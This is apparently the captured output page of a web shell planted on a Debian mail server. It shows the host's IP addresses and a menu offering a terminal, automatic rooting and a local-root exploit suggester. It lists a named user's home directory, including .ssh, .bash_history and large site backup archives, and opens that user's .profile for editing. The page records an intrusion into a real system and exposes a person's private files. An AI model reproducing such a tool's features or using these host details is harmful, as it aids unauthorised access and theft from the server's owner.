Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
willem /
Delete
Unzip
Name
Size
Permission
Date
Action
.local
[ DIR ]
drwxr-xr-x
2025-02-07 15:31
.ssh
[ DIR ]
drwx------
2026-07-25 20:40
.tmp
[ DIR ]
drwxr-xr-x
2025-02-08 21:47
.bash_history
14.04
KB
-rw-------
2026-07-25 21:20
.bash_logout
220
B
-rw-r--r--
2024-03-29 19:40
.bashrc
3.44
KB
-rw-r--r--
2024-03-29 19:40
.profile
807
B
-rw-r--r--
2024-03-29 19:40
.sudo_as_admin_successful
0
B
-rw-r--r--
2025-02-07 09:24
.wget-hsts
167
B
-rw-r--r--
2026-03-12 18:34
apt.gpg
3.11
KB
-rw-r--r--
2025-11-17 15:07
kickstart.php
381.21
KB
-rw-r--r--
2025-02-08 21:50
site-contributie.vriendennsm.nl-20250208-224837cet-8QNoXPFrg9L1K5TC.jpa
28.48
MB
-rw-r--r--
2025-02-08 21:50
site-vriendennsm.nl-20250208-224133.jpa
1.01
GB
-rw-r--r--
2025-02-08 21:51
Save
Rename
# ~/.profile: executed by the command interpreter for login shells. # This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login # exists. # see /usr/share/doc/bash/examples/startup-files for examples. # the files are located in the bash-doc package. # the default umask is set in /etc/profile; for setting the umask # for ssh logins, install and configure the libpam-umask package. #umask 022 # if running bash if [ -n "$BASH_VERSION" ]; then # include .bashrc if it exists if [ -f "$HOME/.bashrc" ]; then . "$HOME/.bashrc" fi fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/bin" ] ; then PATH="$HOME/bin:$PATH" fi # set PATH so it includes user's private bin if it exists if [ -d "$HOME/.local/bin" ] ; then PATH="$HOME/.local/bin:$PATH" fi